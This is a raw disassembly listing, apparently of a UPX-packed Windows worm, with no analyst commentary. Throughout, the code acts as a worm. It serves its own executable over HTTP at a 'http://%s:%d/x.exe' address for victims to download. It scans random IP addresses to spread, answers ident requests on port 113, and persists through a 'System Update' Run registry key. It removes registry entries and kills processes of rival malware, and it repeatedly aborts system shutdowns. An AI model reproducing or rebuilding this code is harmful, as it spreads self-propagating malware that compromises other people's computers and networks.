; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_3150218B+3E�p
; sub_31502252+7�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188 ; gethostbyname
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_3150209F+22�p
; sub_31502103+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D89+40�p
; sub_31501D89+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_315010DC ; OpenEventA
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8 ; SetEvent
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501B9B+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B51
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B51
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push ds:dword_31506150
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A18 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506150
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B6F
push 0
push eax
mov eax, ds:dword_31506148
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B6F
push 64h
add edi, eax
call dword_315010A4 ; Sleep
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501B94
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31505A84
push ebx
call esi ; send
loc_31501B6F: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push 7D0h
call dword_315010A4 ; Sleep
push 2
push ebx
call dword_315011A4 ; shutdown
push ebx
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
loc_31501B94: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501B9B proc near ; DATA XREF: sub_31501D89+133�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150614C, ebx
call sub_315023BF
add esp, 14h
test eax, eax
jnz loc_31501CD0
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010EC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C07
push 1
call dword_315010E0 ; ExitThread
loc_31501C07: ; CODE XREF: sub_31501B9B+62�j
push ebx
push esi
call dword_315010E8 ; GetFileSize
push eax
mov ds:dword_31506150, eax
call sub_315027DB
pop ecx
mov ds:dword_31506148, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506150
push eax
push esi
call dword_315010E4 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506150, eax
call dword_315010BC ; CloseHandle
push ebx
push 1
push 2
call dword_3150118C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A12 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C69: ; CODE XREF: sub_31501B9B+E5�j
; sub_31501B9B+ED�j ...
call dword_31501124 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150617C, eax
jz short loc_31501C69
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C69
push eax
call dword_31501194 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170 ; bind
test eax, eax
jnz short loc_31501C69
push 64h
push edi
call dword_31501174 ; listen
mov [ebp+var_8], esi
pop esi
loc_31501CB2: ; CODE XREF: sub_31501B9B+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178 ; accept
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CB2
; ---------------------------------------------------------------------------
loc_31501CD0: ; CODE XREF: sub_31501B9B+3D�j
push ebx
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CDF proc near ; CODE XREF: sub_31501D89:loc_31501E91�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31501CDF endp
; ---------------------------------------------------------------------------
loc_31501D0B: ; CODE XREF: UPX1:31508548�j
push 0
call dword_315010C4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506180, eax
call dword_31501098 ; DeleteFileA
call sub_315018BA
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov ds:dword_31506154, eax
call dword_3150109C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31501D4D
push 1
call dword_315010F0 ; ExitProcess
loc_31501D4D: ; CODE XREF: UPX0:31501D43�j
call sub_31501727
call sub_31502523
call sub_3150269D
push offset sub_31501D89
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D72
push 0
call sub_31501D89
loc_31501D72: ; CODE XREF: UPX0:31501D69�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D75 proc near ; CODE XREF: sub_31501D89:loc_31501EDF�p
; sub_3150209F:loc_315020B8�p ...
push 0
push ds:dword_31506158
call dword_31501094 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31501D75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D89 proc near ; CODE XREF: UPX0:31501D6D�p
; DATA XREF: UPX0:31501D5C�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A60
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13ix ; "u13ix"
xor edi, edi
push edi
push 1
push edi
call dword_31501090 ; CreateEventA
mov ds:dword_31506158, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501E91
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov ds:dword_31506154, eax
loc_31501E91: ; CODE XREF: sub_31501D89+CD�j
call sub_31501CDF
push edi
push offset sub_31501F46
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi ; Sleep
push edi
push offset loc_315033E3
call sub_315018F7
push edi
push offset sub_31501B9B
call sub_315018F7
push edi
push offset sub_31502BC3
call sub_315018F7
push edi
push offset loc_315022AE
call sub_315018F7
add esp, 20h
loc_31501EDF: ; CODE XREF: sub_31501D89+16D�j
call sub_31501D75
test eax, eax
jnz short loc_31501EF8
push edi
call dword_31501038 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31501EDF
; ---------------------------------------------------------------------------
loc_31501EF8: ; CODE XREF: sub_31501D89+15D�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D89 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F15 proc near ; CODE XREF: sub_31501F46+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A18 ; strlen
test eax, eax
pop ecx
jbe short loc_31501F43
loc_31501F28: ; CODE XREF: sub_31501F15+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F33
cmp al, 0Dh
jnz short loc_31501F37
loc_31501F33: ; CODE XREF: sub_31501F15+18�j
and byte ptr [esi+edi], 0
loc_31501F37: ; CODE XREF: sub_31501F15+1C�j
push edi
inc esi
call sub_31503A18 ; strlen
cmp esi, eax
pop ecx
jb short loc_31501F28
loc_31501F43: ; CODE XREF: sub_31501F15+11�j
pop edi
pop esi
retn
sub_31501F15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F46 proc near ; DATA XREF: sub_31501D89+10E�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150615C
push eax
push ebx
call sub_31503A6C ; _mbscpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168 ; htonl
push 71h
mov [ebp+var_14], eax
call dword_31501194 ; htons
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170 ; bind
test eax, eax
jz short loc_31501FD2
push 1
pop eax
loc_31501FCD: ; CODE XREF: sub_31501F46+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FD2: ; CODE XREF: sub_31501F46+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174 ; listen
test eax, eax
jz short loc_31501FEA
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FCD
; ---------------------------------------------------------------------------
loc_31501FEA: ; CODE XREF: sub_31501F46+9B�j
mov edi, dword_315010A4
loc_31501FF0: ; CODE XREF: sub_31501F46+C6�j
; sub_31501F46+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_3150200E
push 64h
call edi ; Sleep
jmp short loc_31501FF0
; ---------------------------------------------------------------------------
loc_3150200E: ; CODE XREF: sub_31501F46+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0 ; recv
test eax, eax
jnz short loc_31502030
loc_31502027: ; CODE XREF: sub_31501F46+157�j
push esi
call dword_315011A8 ; closesocket
jmp short loc_31501FF0
; ---------------------------------------------------------------------------
loc_31502030: ; CODE XREF: sub_31501F46+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F15
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A66 ; _mbscat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A66 ; _mbscat
lea eax, [ebp+var_148]
push offset asc_31505B7C ; "\r\n"
push eax
call sub_31503A66 ; _mbscat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A18 ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C ; send
push 1388h
call edi ; Sleep
jmp short loc_31502027
sub_31501F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150209F proc near ; DATA XREF: sub_31502103+55�o
; sub_3150218B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020AE
push 1
pop eax
jmp short locret_315020FF
; ---------------------------------------------------------------------------
loc_315020AE: ; CODE XREF: sub_3150209F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020B8: ; CODE XREF: sub_3150209F+5A�j
call sub_31501D75
test eax, eax
jnz short loc_315020FB
call sub_31501A32
test eax, eax
jz short loc_315020FB
cmp [ebp+var_1], bl
jz short loc_315020F4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150618C
pop ecx
call dword_31501124 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4 ; Sleep
loc_315020F4: ; CODE XREF: sub_3150209F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020B8
loc_315020FB: ; CODE XREF: sub_3150209F+20�j
; sub_3150209F+29�j
pop esi
xor eax, eax
pop ebx
locret_315020FF: ; CODE XREF: sub_3150209F+D�j
leave
retn 4
sub_3150209F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502103 proc near ; DATA XREF: sub_3150218B+7E�o
; UPX0:31502340�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502111
push 1
pop eax
jmp short loc_31502187
; ---------------------------------------------------------------------------
loc_31502111: ; CODE XREF: sub_31502103+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502121: ; CODE XREF: sub_31502103+7D�j
call sub_31501D75
test eax, eax
jnz short loc_31502182
call sub_31501A32
test eax, eax
jz short loc_31502182
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31506184
mov byte ptr [ebp+arg_0+3], al
call dword_3150108C ; InterlockedIncrement
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502164
push [ebp+arg_0]
push offset sub_3150209F
call sub_31501911
pop ecx
pop ecx
loc_31502164: ; CODE XREF: sub_31502103+50�j
movzx edi, ds:word_3150618C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31502121
loc_31502182: ; CODE XREF: sub_31502103+25�j
; sub_31502103+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31502187: ; CODE XREF: sub_31502103+C�j
pop ebp
retn 4
sub_31502103 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150218B proc near ; DATA XREF: UPX0:31502358�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D75
test eax, eax
jnz loc_31502244
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021B1: ; CODE XREF: sub_3150218B+48�j
; sub_3150218B+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_315021C0: ; CODE XREF: sub_3150218B+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021C0
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021B1
call sub_31501A32
test eax, eax
jz short loc_3150221C
push offset dword_31506184
call dword_3150108C ; InterlockedIncrement
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502223
push edi
push offset sub_3150209F
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_31502208: ; CODE XREF: sub_3150218B+8D�j
push edi
push offset sub_31502103
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_31502208
jmp short loc_31502223
; ---------------------------------------------------------------------------
loc_3150221C: ; CODE XREF: sub_3150218B+51�j
push 2710h
call ebx ; Sleep
loc_31502223: ; CODE XREF: sub_3150218B+67�j
; sub_3150218B+8F�j
movzx edi, ds:word_3150618C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31501D75
test eax, eax
jz loc_315021B1
pop edi
pop esi
pop ebx
loc_31502244: ; CODE XREF: sub_3150218B+11�j
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3150218B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502252 proc near ; CODE XREF: UPX0:loc_31502319�p
; UPX0:loc_31502383�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190 ; inet_ntoa
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push ds:dword_3150617C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi ; lstrcpy
push offset byte_31505000
call dword_315010A0 ; lstrlen
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502252 endp
; ---------------------------------------------------------------------------
loc_315022AE: ; DATA XREF: sub_31501D89+149�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506184, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_315022DC
loc_315022D0: ; CODE XREF: UPX0:315022DA�j
push edi
call esi ; Sleep
call sub_31501A32
test eax, eax
jz short loc_315022D0
loc_315022DC: ; CODE XREF: UPX0:315022CE�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506188, ebp
pop ebx
mov ds:word_3150618C, 96h
jz short loc_31502319
mov ds:dword_31506188, 1
mov ebx, 15Eh
mov ds:word_3150618C, 14h
loc_31502319: ; CODE XREF: UPX0:315022FF�j
call sub_31502252
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_31502337
push ebp
push offset sub_3150209F
call sub_31501911
pop ecx
pop ecx
loc_31502337: ; CODE XREF: UPX0:31502328�j
mov dword ptr [esp+10h], 4
loc_3150233F: ; CODE XREF: UPX0:31502350�j
push ebp
push offset sub_31502103
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_3150233F
test ebx, ebx
jle short loc_31502367
loc_31502356: ; CODE XREF: UPX0:31502365�j
push 0
push offset sub_3150218B
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_31502356
loc_31502367: ; CODE XREF: UPX0:31502354�j
; UPX0:31502373�j ...
call sub_31501A32
test eax, eax
jz short loc_31502375
push edi
call esi ; Sleep
jmp short loc_31502367
; ---------------------------------------------------------------------------
loc_31502375: ; CODE XREF: UPX0:3150236E�j
; UPX0:31502381�j
call sub_31501A32
test eax, eax
jnz short loc_31502383
push edi
call esi ; Sleep
jmp short loc_31502375
; ---------------------------------------------------------------------------
loc_31502383: ; CODE XREF: UPX0:3150237C�j
call sub_31502252
jmp short loc_31502367
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150238A proc near ; CODE XREF: sub_31502523+8C�p
; sub_3150269D+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jnz short loc_315023BD
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
loc_315023BD: ; CODE XREF: sub_3150238A+1C�j
pop ebp
retn
sub_3150238A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023BF proc near ; CODE XREF: sub_31501B9B+33�p
; sub_31502523+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jz short loc_315023EB
push 1
pop eax
jmp short loc_31502415
; ---------------------------------------------------------------------------
loc_315023EB: ; CODE XREF: sub_315023BF+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028 ; RegQueryValueExA
test eax, eax
jz short loc_3150240A
push 2
pop esi
loc_3150240A: ; CODE XREF: sub_315023BF+46�j
push [ebp+arg_10]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_31502415: ; CODE XREF: sub_315023BF+2A�j
pop esi
leave
retn
sub_315023BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502418 proc near ; CODE XREF: sub_315025D1+96�p
; sub_3150269D+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020 ; RegCreateKeyExA
test eax, eax
jz short loc_31502441
push 1
pop eax
jmp short loc_31502468
; ---------------------------------------------------------------------------
loc_31502441: ; CODE XREF: sub_31502418+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024 ; RegSetValueExA
test eax, eax
jz short loc_3150245D
push 2
pop esi
loc_3150245D: ; CODE XREF: sub_31502418+40�j
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_31502468: ; CODE XREF: sub_31502418+27�j
pop esi
pop ebp
retn
sub_31502418 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150246B proc near ; CODE XREF: sub_31502523+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_3150251F
loc_3150248B: ; CODE XREF: sub_3150246B+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31502494
dec esi
jns short loc_3150248B
loc_31502494: ; CODE XREF: sub_3150246B+24�j
push 0
push 2
call sub_31503A9C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_3150251F
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A12 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503A96 ; Process32First
test eax, eax
jz short loc_3150251F
lea esi, [esi+ebx+1]
loc_315024DC: ; CODE XREF: sub_3150246B+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3150250C
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0 ; OpenProcess
push 0
push eax
call dword_31501080 ; TerminateProcess
loc_3150250C: ; CODE XREF: sub_3150246B+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503A90 ; Process32Next
test eax, eax
jnz short loc_315024DC
loc_3150251F: ; CODE XREF: sub_3150246B+1A�j
; sub_3150246B+38�j ...
pop esi
pop ebx
leave
retn
sub_3150246B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502523 proc near ; CODE XREF: UPX0:31501D52�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_3150258C: ; CODE XREF: sub_31502523+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jnz short loc_315025C3
push ebx
push edi
push esi
call sub_3150238A
lea eax, [ebp+var_138]
push eax
call sub_3150246B
